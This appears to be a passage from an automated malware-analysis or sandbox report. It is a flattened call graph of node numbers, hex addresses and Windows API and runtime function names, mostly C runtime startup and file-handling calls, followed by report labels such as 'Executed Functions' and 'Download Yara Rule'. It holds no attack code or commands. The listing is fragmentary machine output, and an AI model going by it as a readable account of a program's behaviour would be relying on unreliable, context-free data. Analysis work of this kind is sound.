81 API calls 3 library calls 95664->95671 95666 cb3ae2 95672 cb3b04 LeaveCriticalSection LeaveCriticalSection _fprintf 95666->95672 95668 cb3ab7 __lseeki64 95668->95654 95669->95661 95670->95668 95671->95666 95672->95668 95676 cb3839 95673->95676 95675 c94510 95675->95541 95677 cb3845 __lseeki64 95676->95677 95678 cb3880 __lseeki64 95677->95678 95679 cb385b _memset 95677->95679 95680 cb3888 95677->95680 95678->95675 95689 cb7c0e 47 API calls __getptd_noexit 95679->95689 95681 cb4e1c __lock_file 48 API calls 95680->95681 95682 cb388e 95681->95682 95691 cb365b 62 API calls 6 library calls 95682->95691 95685 cb3875 95690 cb6e10 8 API calls __woutput_l 95685->95690 95687 cb38a4 95692 cb38c2 LeaveCriticalSection LeaveCriticalSection _fprintf 95687->95692 95689->95685 95690->95678 95691->95687 95692->95678 95696 cb344a GetSystemTimeAsFileTime 95693->95696 95695 cdbdc3 95695->95543 95697 cb3478 __aulldiv 95696->95697 95697->95695 95699 cb3e71 __lseeki64 95698->95699 95700 cb3e7f 95699->95700 95701 cb3e94 95699->95701 95712 cb7c0e 47 API calls __getptd_noexit 95700->95712 95703 cb4e1c __lock_file 48 API calls 95701->95703 95705 cb3e9a 95703->95705 95704 cb3e84 95713 cb6e10 8 API calls __woutput_l 95704->95713 95714 cb3b0c 55 API calls 3 library calls 95705->95714 95708 cb3ea5 95715 cb3ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 95708->95715 95710 cb3eb7 95711 cb3e8f __lseeki64 95710->95711 95711->95548 95712->95704 95713->95711 95714->95708 95715->95710 95717 cb1e61 95716->95717 95720 cb1e55 95716->95720 95740 cb7c0e 47 API calls __getptd_noexit 95717->95740 95719 cb2019 95722 cb1e41 95719->95722 95741 cb6e10 8 API calls __woutput_l 95719->95741 95720->95717 95724 cb1ed4 95720->95724 95735 cb9d6b 47 API calls __woutput_l 95720->95735 95722->94996 95724->95717 95730 cb1f41 95724->95730 95736 cb9d6b 47 API calls __woutput_l 95724->95736 95725 cb1fa0 95725->95717 95725->95722 95726 cb1fb0 95725->95726 95739 cb9d6b 47 API calls __woutput_l 95726->95739 95727 cb1f7b 95727->95717 95727->95722 95732 cb1f91 95727->95732 95728 cb1f5f 95728->95717 95728->95727 95737 cb9d6b 47 API calls __woutput_l 95728->95737 95730->95725 95730->95728 95738 cb9d6b 47 API calls __woutput_l 95732->95738 95735->95724 95736->95730 95737->95727 95738->95722 95739->95722 95740->95719 95741->95722 95742->95479 95744 cb2aba __lseeki64 95743->95744 95745 cb2aec 95744->95745 95746 cb2ad4 95744->95746 95748 cb2ae4 __lseeki64 95744->95748 95749 cb4e1c __lock_file 48 API calls 95745->95749 95808 cb7c0e 47 API calls __getptd_noexit 95746->95808 95748->95491 95751 cb2af2 95749->95751 95750 cb2ad9 95809 cb6e10 8 API calls __woutput_l 95750->95809 95796 cb2957 95751->95796 95757 cdc6ff SetFileTime CloseHandle 95756->95757 95758 cdc715 95756->95758 95757->95758 95758->95459 95761 cdc581 __tzset_nolock _wcscmp 95759->95761 95760 cdbf5a GetSystemTimeAsFileTime 95760->95761 95761->95760 95762 c944ed 64 API calls 95761->95762 95763 cdc05f 95761->95763 95764 c94517 83 API calls 95761->95764 95762->95761 95763->95457 95763->95459 95764->95761 95766 cdb97e 95765->95766 95767 cdb970 95765->95767 95769 cdb9c3 95766->95769 95770 cb3499 117 API calls 95766->95770 95792 cdb987 95766->95792 95768 cb3499 117 API calls 95767->95768 95768->95766 95814 cdbbe8 64 API calls 3 library calls 95769->95814 95771 cdb9a8 95770->95771 95771->95769 95773 cdb9b1 95771->95773 95777 cb35e4 __fcloseall 83 API calls 95773->95777 95773->95792 95774 cdba07 95775 cdba2c 95774->95775 95776 cdba0b 95774->95776 95815 cdb7e5 47 API calls __malloc_crt 95775->95815 95779 cdba18 95776->95779 95781 cb35e4 __fcloseall 83 API calls 95776->95781 95777->95792 95782 cb35e4 __fcloseall 83 API calls 95779->95782 95779->95792 95780 cdba34 95783 cdba5a 95780->95783 95784 cdba3a 95780->95784 95781->95779 95782->95792 95816 cdba8a 90 API calls 95783->95816 95786 cdba47 95784->95786 95788 cb35e4 __fcloseall 83 API calls 95784->95788 95790 cb35e4 __fcloseall 83 API calls 95786->95790 95786->95792 95787 cdba61 95817 cdbb64 95787->95817 95788->95786 95790->95792 95792->95489 95792->95496 95799 cb2966 95796->95799 95802 cb2984 95796->95802 95797 cb2974 95811 cb7c0e 47 API calls __getptd_noexit 95797->95811 95799->95797 95799->95802 95806 cb299c _memcpy_s 95799->95806 95800 cb2979 95812 cb6e10 8 API calls __woutput_l 95800->95812 95810 cb2b24 LeaveCriticalSection LeaveCriticalSection _fprintf 95802->95810 95804 cb2c84 __flush 78 API calls 95804->95806 95805 cb2933 __ftell_nolock 47 API calls 95805->95806 95806->95802 95806->95804 95806->95805 95807 cbaf61 __flush 78 API calls 95806->95807 95813 cb8e63 78 API calls 6 library calls 95806->95813 95807->95806 95808->95750 95809->95748 95810->95748 95811->95800 95812->95802 95813->95806 95814->95774 95815->95780 95816->95787 95825->95059 95826->95025 95827->95032 95828->95037 95829->95040 95830->95051 95831->95053 95832->95057 95833->94776 95834->94776 95835->94774 95836->94774 95837->94769 95838->94764 95839->94775 95840->94789 95841->94789 95842->94783 95843 cb5dfd 95844 cb5e09 __lseeki64 95843->95844 95880 cb7eeb GetStartupInfoW 95844->95880 95846 cb5e0e 95882 cb9ca7 GetProcessHeap 95846->95882 95848 cb5e66 95849 cb5e71 95848->95849 95967 cb5f4d 47 API calls 3 library calls 95848->95967 95883 cb7b47 95849->95883 95852 cb5e77 95853 cb5e82 __RTC_Initialize 95852->95853 95968 cb5f4d 47 API calls 3 library calls 95852->95968 95904 cbacb3 95853->95904 95856 cb5e91 95857 cb5e9d GetCommandLineW 95856->95857 95969 cb5f4d 47 API calls 3 library calls 95856->95969 95923 cc2e7d GetEnvironmentStringsW 95857->95923 95860 cb5e9c 95860->95857 95864 cb5ec2 95936 cc2cb4 95864->95936 95867 cb5ec8 95868 cb5ed3 95867->95868 95971 cb115b 47 API calls 3 library calls 95867->95971 95950 cb1195 95868->95950 95871 cb5edb 95872 cb5ee6 __wwincmdln 95871->95872 95972 cb115b 47 API calls 3 library calls 95871->95972 95954 c93a0f 95872->95954 95875 cb5efa 95876 cb5f09 95875->95876 95973 cb13f1 47 API calls _doexit 95875->95973 95974 cb1186 47 API calls _doexit 95876->95974 95879 cb5f0e __lseeki64 95881 cb7f01 95880->95881 95881->95846 95882->95848 95975 cb123a 30 API calls 2 library calls 95883->95975 95885 cb7b4c 95976 cb7e23 InitializeCriticalSectionAndSpinCount 95885->95976 95887 cb7b51 95888 cb7b55 95887->95888 95978 cb7e6d TlsAlloc 95887->95978 95977 cb7bbd 50 API calls 2 library calls 95888->95977 95891 cb7b5a 95891->95852 95892 cb7b67 95892->95888 95893 cb7b72 95892->95893 95979 cb6986 95893->95979 95896 cb7bb4 95987 cb7bbd 50 API calls 2 library calls 95896->95987 95899 cb7bb9 95899->95852 95900 cb7b93 95900->95896 95901 cb7b99 95900->95901 95986 cb7a94 47 API calls 4 library calls 95901->95986 95903 cb7ba1 GetCurrentThreadId 95903->95852 95905 cbacbf __lseeki64 95904->95905 95906 cb7cf4 __lock 47 API calls 95905->95906 95907 cbacc6 95906->95907 95908 cb6986 __calloc_crt 47 API calls 95907->95908 95910 cbacd7 95908->95910 95909 cbad42 GetStartupInfoW 95918 cbae80 95909->95918 95920 cbad57 95909->95920 95910->95909 95911 cbace2 __lseeki64 @_EH4_CallFilterFunc@8 95910->95911 95911->95856 95912 cbaf44 95996 cbaf58 LeaveCriticalSection _doexit 95912->95996 95914 cbaec9 GetStdHandle 95914->95918 95915 cb6986 __calloc_crt 47 API calls 95915->95920 95916 cbaedb GetFileType 95916->95918 95917 cbada5 95917->95918 95921 cbadd7 GetFileType 95917->95921 95922 cbade5 InitializeCriticalSectionAndSpinCount 95917->95922 95918->95912 95918->95914 95918->95916 95919 cbaf08 InitializeCriticalSectionAndSpinCount 95918->95919 95919->95918 95920->95915 95920->95917 95920->95918 95921->95917 95921->95922 95922->95917 95924 cc2e8e 95923->95924 95925 cb5ead 95923->95925 95997 cb69d0 47 API calls __malloc_crt 95924->95997 95930 cc2a7b GetModuleFileNameW 95925->95930 95928 cc2eca FreeEnvironmentStringsW 95928->95925 95929 cc2eb4 _memcpy_s 95929->95928 95931 cc2aaf _wparse_cmdline 95930->95931 95932 cb5eb7 95931->95932 95933 cc2ae9 95931->95933 95932->95864 95970 cb115b 47 API calls 3 library calls 95932->95970 95998 cb69d0 47 API calls __malloc_crt 95933->95998 95935 cc2aef _wparse_cmdline 95935->95932 95937 cc2ccd __wsetenvp 95936->95937 95938 cc2cc5 95936->95938 95939 cb6986 __calloc_crt 47 API calls 95937->95939 95938->95867 95946 cc2cf6 __wsetenvp 95939->95946 95940 cc2d4d 95941 cb1c9d _free 47 API calls 95940->95941 95941->95938 95942 cb6986 __calloc_crt 47 API calls 95942->95946 95943 cc2d72 95944 cb1c9d _free 47 API calls 95943->95944 95944->95938 95946->95938 95946->95940 95946->95942 95946->95943 95947 cc2d89 95946->95947 95999 cc2567 47 API calls __woutput_l 95946->95999 96000 cb6e20 IsProcessorFeaturePresent 95947->96000 95949 cc2d95 95949->95867 95951 cb11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95950->95951 95953 cb11e0 __IsNonwritableInCurrentImage 95951->95953 96015 cb0f0a 52 API calls __cinit 95951->96015 95953->95871 95955 d01ebf 95954->95955 95956 c93a29 95954->95956 95957 c93a63 IsThemeActive 95956->95957 96016 cb1405 95957->96016 95961 c93a8f 96028 c93adb SystemParametersInfoW SystemParametersInfoW 95961->96028 95963 c93a9b 96029 c93d19 95963->96029 95965 c93aa3 SystemParametersInfoW 95966 c93ac8 95965->95966 95966->95875 95967->95849 95968->95853 95969->95860 95973->95876 95974->95879 95975->95885 95976->95887 95977->95891 95978->95892 95982 cb698d 95979->95982 95981 cb69ca 95981->95896 95985 cb7ec9 TlsSetValue 95981->95985 95982->95981 95983 cb69ab Sleep 95982->95983 95988 cc30aa 95982->95988 95984 cb69c2 95983->95984 95984->95981 95984->95982 95985->95900 95986->95903 95987->95899 95989 cc30b5 95988->95989 95993 cc30d0 __calloc_impl 95988->95993 95990 cc30c1 95989->95990 95989->95993 95995 cb7c0e 47 API calls __getptd_noexit 95990->95995 95991 cc30e0 RtlAllocateHeap 95991->95993 95994 cc30c6 95991->95994 95993->95991 95993->95994 95994->95982 95995->95994 95996->95911 95997->95929 95998->95935 95999->95946 96001 cb6e2b 96000->96001 96006 cb6cb5 96001->96006 96005 cb6e46 96005->95949 96007 cb6ccf _memset __call_reportfault 96006->96007 96008 cb6cef IsDebuggerPresent 96007->96008 96014 cb81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 96008->96014 96010 cb6db3 __call_reportfault 96011 cba70c __woutput_l 6 API calls 96010->96011 96012 cb6dd6 96011->96012 96013 cb8197 GetCurrentProcess TerminateProcess 96012->96013 96013->96005 96014->96010 96015->95953 96017 cb7cf4 __lock 47 API calls 96016->96017 96018 cb1410 96017->96018 96081 cb7e58 LeaveCriticalSection 96018->96081 96020 c93a88 96021 cb146d 96020->96021 96022 cb1491 96021->96022 96023 cb1477 96021->96023 96022->95961 96023->96022 96082 cb7c0e 47 API calls __getptd_noexit 96023->96082 96025 cb1481 96083 cb6e10 8 API calls __woutput_l 96025->96083 96027 cb148c 96027->95961 96028->95963 96030 c93d26 __ftell_nolock 96029->96030 96031 c9d7f7 48 API calls 96030->96031 96032 c93d31 GetCurrentDirectoryW 96031->96032 96084 c961ca 96032->96084 96034 c93d57 IsDebuggerPresent 96035 d01cc1 MessageBoxA 96034->96035 96036 c93d65 96034->96036 96039 d01cd9 96035->96039 96037 c93e3a 96036->96037 96036->96039 96040 c93d82 96036->96040 96038 c93e41 SetCurrentDirectoryW 96037->96038 96041 c93e4e Mailbox 96038->96041 96199 cac682 48 API calls 96039->96199 96158 c940e5 96040->96158 96041->95965 96044 d01ce9 96050 d01cff SetCurrentDirectoryW 96044->96050 96050->96041 96081->96020 96082->96025 96083->96027 96201 cae99b 96084->96201 96088 c961eb 96089 c95374 50 API calls 96088->96089 96090 c961ff 96089->96090 96091 c9ce19 48 API calls 96090->96091 96092 c9620c 96091->96092 96218 c939db 96092->96218 96094 c96216 Mailbox 96095 c96eed 48 API calls 96094->96095 96096 c9622b 96095->96096 96230 c99048 96096->96230 96099 c9ce19 48 API calls 96100 c96244 96099->96100 96101 c9d6e9 55 API calls 96100->96101 96102 c96254 Mailbox 96101->96102 96103 c9ce19 48 API calls 96102->96103 96104 c9627c 96103->96104 96105 c9d6e9 55 API calls 96104->96105 96106 c9628f Mailbox 96105->96106 96107 c9ce19 48 API calls 96106->96107 96108 c962a0 96107->96108 96109 c9d645 53 API calls 96108->96109 96110 c962b2 Mailbox 96109->96110 96111 c9d7f7 48 API calls 96110->96111 96112 c962c5 96111->96112 96233 c963fc 96112->96233 96116 c962df 96117 c962e9 96116->96117 96118 d01c08 96116->96118 96120 cb0fa7 _W_store_winword 59 API calls 96117->96120 96119 c963fc 48 API calls 96118->96119 96121 d01c1c 96119->96121 96122 c962f4 96120->96122 96125 c963fc 48 API calls 96121->96125 96122->96121 96123 c962fe 96122->96123 96124 cb0fa7 _W_store_winword 59 API calls 96123->96124 96126 c96309 96124->96126 96127 d01c38 96125->96127 96126->96127 96128 c96313 96126->96128 96130 c95374 50 API calls 96127->96130 96129 cb0fa7 _W_store_winword 59 API calls 96128->96129 96131 c9631e 96129->96131 96132 d01c5d 96130->96132 96134 c9635f 96131->96134 96136 d01c86 96131->96136 96139 c963fc 48 API calls 96131->96139 96133 c963fc 48 API calls 96132->96133 96135 d01c69 96133->96135 96134->96136 96137 c9636c 96134->96137 96138 c96eed 48 API calls 96135->96138 96140 c96eed 48 API calls 96136->96140 96141 cac050 48 API calls 96137->96141 96142 d01c77 96138->96142 96143 c96342 96139->96143 96144 d01ca8 96140->96144 96145 c96384 96141->96145 96146 c963fc 48 API calls 96142->96146 96147 c96eed 48 API calls 96143->96147 96148 c963fc 48 API calls 96144->96148 96149 ca1b90 48 API calls 96145->96149 96146->96136 96150 c96350 96147->96150 96151 d01cb5 96148->96151 96155 c96394 96149->96155 96152 c963fc 48 API calls 96150->96152 96151->96151 96152->96134 96153 ca1b90 48 API calls 96153->96155 96155->96153 96156 c963fc 48 API calls 96155->96156 96157 c963d6 Mailbox 96155->96157 96249 c96b68 48 API calls 96155->96249 96156->96155 96157->96034 96159 c940f2 __ftell_nolock 96158->96159 96160 c9410b 96159->96160 96161 d0370e _memset 96159->96161 96162 c9660f 49 API calls 96160->96162 96163 d0372a GetOpenFileNameW 96161->96163 96164 c94114 96162->96164 96165 d03779 96163->96165 96291 c940a7 96164->96291 96167 c96a63 48 API calls 96165->96167 96169 d0378e 96167->96169 96169->96169 96199->96044 96202 c9d7f7 48 API calls 96201->96202 96203 c961db 96202->96203 96204 c96009 96203->96204 96205 c96016 __ftell_nolock 96204->96205 96206 c96a63 48 API calls 96205->96206 96210 c9617c Mailbox 96205->96210 96208 c96048 96206->96208 96216 c9607e Mailbox 96208->96216 96250 c961a6 96208->96250 96209 c9614f 96209->96210 96211 c9ce19 48 API calls 96209->96211 96210->96088 96213 c96170 96211->96213 96212 c9ce19 48 API calls 96212->96216 96215 c964cf 48 API calls 96213->96215 96214 c961a6 48 API calls 96214->96216 96215->96210 96216->96209 96216->96210 96216->96212 96216->96214 96217 c964cf 48 API calls 96216->96217 96217->96216 96219 c941a9 136 API calls 96218->96219 96220 c939fe 96219->96220 96221 c93a06 96220->96221 96253 cdc396 96220->96253 96221->96094 96224 d02ff0 96226 cb1c9d _free 47 API calls 96224->96226 96225 c94252 84 API calls 96225->96224 96227 d02ffd 96226->96227 96228 c94252 84 API calls 96227->96228 96229 d03006 96228->96229 96229->96229 96231 caf4ea 48 API calls 96230->96231 96232 c96237 96231->96232 96232->96099 96234 c9641f 96233->96234 96235 c96406 96233->96235 96237 c96a63 48 API calls 96234->96237 96236 c96eed 48 API calls 96235->96236 96238 c962d1 96236->96238 96237->96238 96239 cb0fa7 96238->96239 96240 cb1028 96239->96240 96241 cb0fb3 96239->96241 96290 cb103a 59 API calls 3 library calls 96240->96290 96248 cb0fd8 96241->96248 96288 cb7c0e 47 API calls __getptd_noexit 96241->96288 96243 cb1035 96243->96116 96245 cb0fbf 96289 cb6e10 8 API calls __woutput_l 96245->96289 96247 cb0fca 96247->96116 96248->96116 96249->96155 96251 c9bdfa 48 API calls 96250->96251 96252 c961b1 96251->96252 96252->96208 96254 c94517 83 API calls 96253->96254 96255 cdc405 96254->96255 96256 cdc56d 94 API calls 96255->96256 96257 cdc417 96256->96257 96258 c944ed 64 API calls 96257->96258 96286 cdc41b 96257->96286 96259 cdc432 96258->96259 96260 c944ed 64 API calls 96259->96260 96261 cdc442 96260->96261 96262 c944ed 64 API calls 96261->96262 96263 cdc45d 96262->96263 96264 c944ed 64 API calls 96263->96264 96265 cdc478 96264->96265 96266 c94517 83 API calls 96265->96266 96267 cdc48f 96266->96267 96268 cb395c __malloc_crt 47 API calls 96267->96268 96269 cdc496 96268->96269 96270 cb395c __malloc_crt 47 API calls 96269->96270 96271 cdc4a0 96270->96271 96272 c944ed 64 API calls 96271->96272 96273 cdc4b4 96272->96273 96274 cdbf5a GetSystemTimeAsFileTime 96273->96274 96275 cdc4c7 96274->96275 96276 cdc4dc 96275->96276 96277 cdc4f1 96275->96277 96278 cb1c9d _free 47 API calls 96276->96278 96279 cdc4f7 96277->96279 96280 cdc556 96277->96280 96281 cdc4e2 96278->96281 96282 cdb965 118 API calls 96279->96282 96283 cb1c9d _free 47 API calls 96280->96283 96284 cb1c9d _free 47 API calls 96281->96284 96285 cdc54e 96282->96285 96283->96286 96284->96286 96287 cb1c9d _free 47 API calls 96285->96287 96286->96224 96286->96225 96287->96286 96288->96245 96289->96247 96290->96243 96292 cbf8a0 __ftell_nolock 96291->96292 96293 c940b4 GetLongPathNameW 96292->96293 96294 c96a63 48 API calls 96293->96294 96295 c940dc 96294->96295 96296 c949a0 96295->96296 96297 c9d7f7 48 API calls 96296->96297 96298 c949b2 96297->96298 96299 c9660f 49 API calls 96298->96299 96300 c949bd 96299->96300 96301 c949c8 96300->96301 96305 d02e35 96300->96305 96302 c964cf 48 API calls 96301->96302 96304 c949d4 96302->96304 96307 d02e4f 96305->96307 96349 cad35e 60 API calls 96305->96349 96349->96305 96501 c9b7b1 96510 c9c62c 96501->96510 96503 c9b7ec 96520 c9ba85 48 API calls _memcpy_s 96503->96520 96504 c9b7c2 96504->96503 96518 c9bc74 48 API calls 96504->96518 96507 c9b7e0 96519 c9ba85 48 API calls _memcpy_s 96507->96519 96509 c9b6b7 Mailbox 96511 c9bcce 48 API calls 96510->96511 96515 c9c63b 96511->96515 96512 d039fd 96521 cd26bc 88 API calls 4 library calls 96512->96521 96514 c9c68b 96514->96504 96515->96512 96515->96514 96517 c9c799 48 API calls 96515->96517 96516 d03a0b 96517->96515 96518->96507 96519->96503 96520->96509 96521->96516 96522 c9f030 96523 ca3b70 335 API calls 96522->96523 96524 c9f03c 96523->96524 96525 10ad0f0 96539 10aad40 96525->96539 96527 10ad1b1 96542 10acfe0 96527->96542 96541 10ab3cb 96539->96541 96545 10ae1e0 GetPEB 96539->96545 96541->96527 96543 10acfe9 Sleep 96542->96543 96544 10acff7 96543->96544 96545->96541 96546 d019cb 96551 c92322 96546->96551 96548 d019d1 96584 cb0f0a 52 API calls __cinit 96548->96584 96550 d019db 96552 c92344 96551->96552 96585 c926df 96552->96585 96557 c9d7f7 48 API calls 96558 c92384 96557->96558 96559 c9d7f7 48 API calls 96558->96559 96560 c9238e 96559->96560 96561 c9d7f7 48 API calls 96560->96561 96562 c92398 96561->96562 96563 c9d7f7 48 API calls 96562->96563 96564 c923de 96563->96564 96565 c9d7f7 48 API calls 96564->96565 96566 c924c1 96565->96566 96593 c9263f 96566->96593 96570 c924f1 96571 c9d7f7 48 API calls 96570->96571 96572 c924fb 96571->96572 96622 c92745 96572->96622 96574 c92546 96575 c92556 GetStdHandle 96574->96575 96576 c925b1 96575->96576 96577 d0501d 96575->96577 96578 c925b7 CoInitialize 96576->96578 96577->96576 96579 d05026 96577->96579 96578->96548 96629 cd92d4 53 API calls 96579->96629 96581 d0502d 96630 cd99f9 CreateThread 96581->96630 96583 d05039 CloseHandle 96583->96578 96584->96550 96631 c92854 96585->96631 96588 c96a63 48 API calls 96589 c9234a 96588->96589 96590 c9272e 96589->96590 96645 c927ec 6 API calls 96590->96645 96592 c9237a 96592->96557 96594 c9d7f7 48 API calls 96593->96594 96595 c9264f 96594->96595 96596 c9d7f7 48 API calls 96595->96596 96597 c92657 96596->96597 96646 c926a7 96597->96646 96600 c926a7 48 API calls 96601 c92667 96600->96601 96602 c9d7f7 48 API calls 96601->96602 96603 c92672 96602->96603 96604 caf4ea 48 API calls 96603->96604 96605 c924cb 96604->96605 96606 c922a4 96605->96606 96607 c922b2 96606->96607 96608 c9d7f7 48 API calls 96607->96608 96609 c922bd 96608->96609 96610 c9d7f7 48 API calls 96609->96610 96611 c922c8 96610->96611 96612 c9d7f7 48 API calls 96611->96612 96613 c922d3 96612->96613 96614 c9d7f7 48 API calls 96613->96614 96615 c922de 96614->96615 96616 c926a7 48 API calls 96615->96616 96617 c922e9 96616->96617 96618 caf4ea 48 API calls 96617->96618 96619 c922f0 96618->96619 96620 c922f9 RegisterWindowMessageW 96619->96620 96621 d01fe7 96619->96621 96620->96570 96623 c92755 96622->96623 96624 d05f4d 96622->96624 96625 caf4ea 48 API calls 96623->96625 96651 cdc942 50 API calls 96624->96651 96627 c9275d 96625->96627 96627->96574 96628 d05f58 96629->96581 96630->96583 96652 cd99df 54 API calls 96630->96652 96638 c92870 96631->96638 96634 c92870 48 API calls 96635 c92864 96634->96635 96636 c9d7f7 48 API calls 96635->96636 96637 c92716 96636->96637 96637->96588 96639 c9d7f7 48 API calls 96638->96639 96640 c9287b 96639->96640 96641 c9d7f7 48 API calls 96640->96641 96642 c92883 96641->96642 96643 c9d7f7 48 API calls 96642->96643 96644 c9285c 96643->96644 96644->96634 96645->96592 96647 c9d7f7 48 API calls 96646->96647 96648 c926b0 96647->96648 96649 c9d7f7 48 API calls 96648->96649 96650 c9265f 96649->96650 96650->96600 96651->96628 96653 d09bec 96689 ca0ae0 _memcpy_s Mailbox 96653->96689 96658 ca0509 96748 cdcc5c 86 API calls 4 library calls 96658->96748 96659 caf4ea 48 API calls 96683 c9fec8 96659->96683 96661 ca146e 96668 c96eed 48 API calls 96661->96668 96662 c96eed 48 API calls 96662->96683 96664 ca1473 96747 cdcc5c 86 API calls 4 library calls 96664->96747 96666 d0a246 96670 c96eed 48 API calls 96666->96670 96667 d0a922 96682 c9ffe1 Mailbox 96668->96682 96670->96682 96672 c9d7f7 48 API calls 96672->96683 96673 d0a873 96674 d0a30e 96674->96682 96743 cc97ed InterlockedDecrement 96674->96743 96675 cb0f0a 52 API calls __cinit 96675->96683 96676 c9ce19 48 API calls 96676->96689 96677 cc97ed InterlockedDecrement 96677->96683 96679 d0a973 96749 cdcc5c 86 API calls 4 library calls 96679->96749 96681 d0a982 96683->96658 96683->96659 96683->96661 96683->96662 96683->96664 96683->96666 96683->96672 96683->96674 96683->96675 96683->96677 96683->96679 96683->96682 96684 ca15b5 96683->96684 96740 ca1820 335 API calls 2 library calls 96683->96740 96741 ca1d10 59 API calls Mailbox 96683->96741 96746 cdcc5c 86 API calls 4 library calls 96684->96746 96685 cee822 335 API calls 96685->96689 96686 c9fe30 335 API calls 96686->96689 96687 d0a706 96744 cdcc5c 86 API calls 4 library calls 96687->96744 96689->96676 96689->96682 96689->96683 96689->96685 96689->96686 96689->96687 96690 ca1526 Mailbox 96689->96690 96691 caf4ea 48 API calls 96689->96691 96692 cc97ed InterlockedDecrement 96689->96692 96695 ce6ff0 335 API calls 96689->96695 96696 cf0d1d 96689->96696 96699 cf0d09 96689->96699 96702 cef0ac 96689->96702 96734 cda6ef 96689->96734 96742 ceef61 82 API calls 2 library calls 96689->96742 96745 cdcc5c 86 API calls 4 library calls 96690->96745 96691->96689 96692->96689 96695->96689 96750 cef8ae 96696->96750 96698 cf0d2d 96698->96689 96700 cef8ae 129 API calls 96699->96700 96701 cf0d19 96700->96701 96701->96689 96703 c9d7f7 48 API calls 96702->96703 96704 cef0c0 96703->96704 96705 c9d7f7 48 API calls 96704->96705 96706 cef0c8 96705->96706 96707 c9d7f7 48 API calls 96706->96707 96708 cef0d0 96707->96708 96709 c9936c 81 API calls 96708->96709 96733 cef0de 96709->96733 96710 c96a63 48 API calls 96710->96733 96711 c9c799 48 API calls 96711->96733 96712 cef2cc 96713 cef2f9 Mailbox 96712->96713 96852 c96b68 48 API calls 96712->96852 96713->96689 96714 cef2b3 96717 c9518c 48 API calls 96714->96717 96716 cef2ce 96718 c9518c 48 API calls 96716->96718 96720 cef2c0 96717->96720 96721 cef2dd 96718->96721 96719 c96eed 48 API calls 96719->96733 96723 c9510d 48 API calls 96720->96723 96724 c9510d 48 API calls 96721->96724 96722 c9bdfa 48 API calls 96726 cef175 CharUpperBuffW 96722->96726 96723->96712 96724->96712 96725 c9bdfa 48 API calls 96727 cef23a CharUpperBuffW 96725->96727 96728 c9d645 53 API calls 96726->96728 96851 cad922 55 API calls 2 library calls 96727->96851 96728->96733 96730 c9518c 48 API calls 96730->96733 96731 c9936c 81 API calls 96731->96733 96732 c9510d 48 API calls 96732->96733 96733->96710 96733->96711 96733->96712 96733->96713 96733->96714 96733->96716 96733->96719 96733->96722 96733->96725 96733->96730 96733->96731 96733->96732 96735 cda6fb 96734->96735 96736 caf4ea 48 API calls 96735->96736 96737 cda709 96736->96737 96738 cda717 96737->96738 96739 c9d7f7 48 API calls 96737->96739 96738->96689 96739->96738 96740->96683 96741->96683 96742->96689 96743->96682 96744->96690 96745->96682 96746->96682 96747->96673 96748->96667 96749->96681 96751 c9936c 81 API calls 96750->96751 96752 cef8ea 96751->96752 96753 cef92c Mailbox 96752->96753 96786 cf0567 96752->96786 96753->96698 96755 cefb8b 96756 cefcfa 96755->96756 96757 cefb95 96755->96757 96834 cf0688 89 API calls Mailbox 96756->96834 96799 cef70a 96757->96799 96760 cefd07 96760->96757 96762 cefd13 96760->96762 96761 c9936c 81 API calls 96779 cef984 Mailbox 96761->96779 96762->96753 96767 cefbc9 96813 caed18 96767->96813 96770 cefbfd 96773 cac050 48 API calls 96770->96773 96771 cefbe3 96832 cdcc5c 86 API calls 4 library calls 96771->96832 96775 cefc14 96773->96775 96774 cefbee GetCurrentProcess TerminateProcess 96774->96770 96776 ca1b90 48 API calls 96775->96776 96785 cefc3e 96775->96785 96778 cefc2d 96776->96778 96777 cefd65 96777->96753 96782 cefd7e FreeLibrary 96777->96782 96780 cf040f 105 API calls 96778->96780 96779->96753 96779->96755 96779->96761 96779->96779 96830 cf29e8 48 API calls _memcpy_s 96779->96830 96831 cefda5 60 API calls 2 library calls 96779->96831 96780->96785 96781 ca1b90 48 API calls 96781->96785 96782->96753 96785->96777 96785->96781 96817 cf040f 96785->96817 96833 c9dcae 50 API calls Mailbox 96785->96833 96787 c9bdfa 48 API calls 96786->96787 96788 cf0582 CharLowerBuffW 96787->96788 96835 cd1f11 96788->96835 96792 c9d7f7 48 API calls 96793 cf05bb 96792->96793 96842 c969e9 48 API calls _memcpy_s 96793->96842 96795 cf05d2 96797 c9b18b 48 API calls 96795->96797 96796 cf061a Mailbox 96796->96779 96798 cf05de Mailbox 96797->96798 96798->96796 96843 cefda5 60 API calls 2 library calls 96798->96843 96800 cef725 96799->96800 96804 cef77a 96799->96804 96801 caf4ea 48 API calls 96800->96801 96802 cef747 96801->96802 96803 caf4ea 48 API calls 96802->96803 96802->96804 96803->96802 96805 cf0828 96804->96805 96806 cf0a53 Mailbox 96805->96806 96812 cf084b _strcat _wcscpy __wsetenvp 96805->96812 96806->96767 96807 c9cf93 58 API calls 96807->96812 96808 c9d286 48 API calls 96808->96812 96809 c9936c 81 API calls 96809->96812 96810 cb395c 47 API calls __malloc_crt 96810->96812 96812->96806 96812->96807 96812->96808 96812->96809 96812->96810 96846 cd8035 50 API calls __wsetenvp 96812->96846 96814 caed2d 96813->96814 96815 caedc5 VirtualProtect 96814->96815 96816 caed93 96814->96816 96815->96816 96816->96770 96816->96771 96818 cf0427 96817->96818 96825 cf0443 96817->96825 96820 cf044f 96818->96820 96821 cf042e 96818->96821 96822 cf04f8 96818->96822 96818->96825 96819 cf051e 96819->96785 96849 c9cdb9 48 API calls 96820->96849 96847 cd7c56 50 API calls _strlen 96821->96847 96850 cd9dc5 103 API calls 96822->96850 96823 cb1c9d _free 47 API calls 96823->96819 96825->96819 96825->96823 96828 cf0438 96848 c9cdb9 48 API calls 96828->96848 96830->96779 96831->96779 96832->96774 96833->96785 96834->96760 96836 cd1f3b __wsetenvp 96835->96836 96837 cd1f79 96836->96837 96839 cd1f6f 96836->96839 96840 cd1ffa 96836->96840 96837->96792 96837->96798 96839->96837 96844 cad37a 60 API calls 96839->96844 96840->96837 96845 cad37a 60 API calls 96840->96845 96842->96795 96843->96796 96844->96839 96845->96840 96846->96812 96847->96828 96848->96825 96849->96825 96850->96825 96851->96733 96852->96713

                                                                                                                          Executed Functions

                                                                                                                          Function 00CBB043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
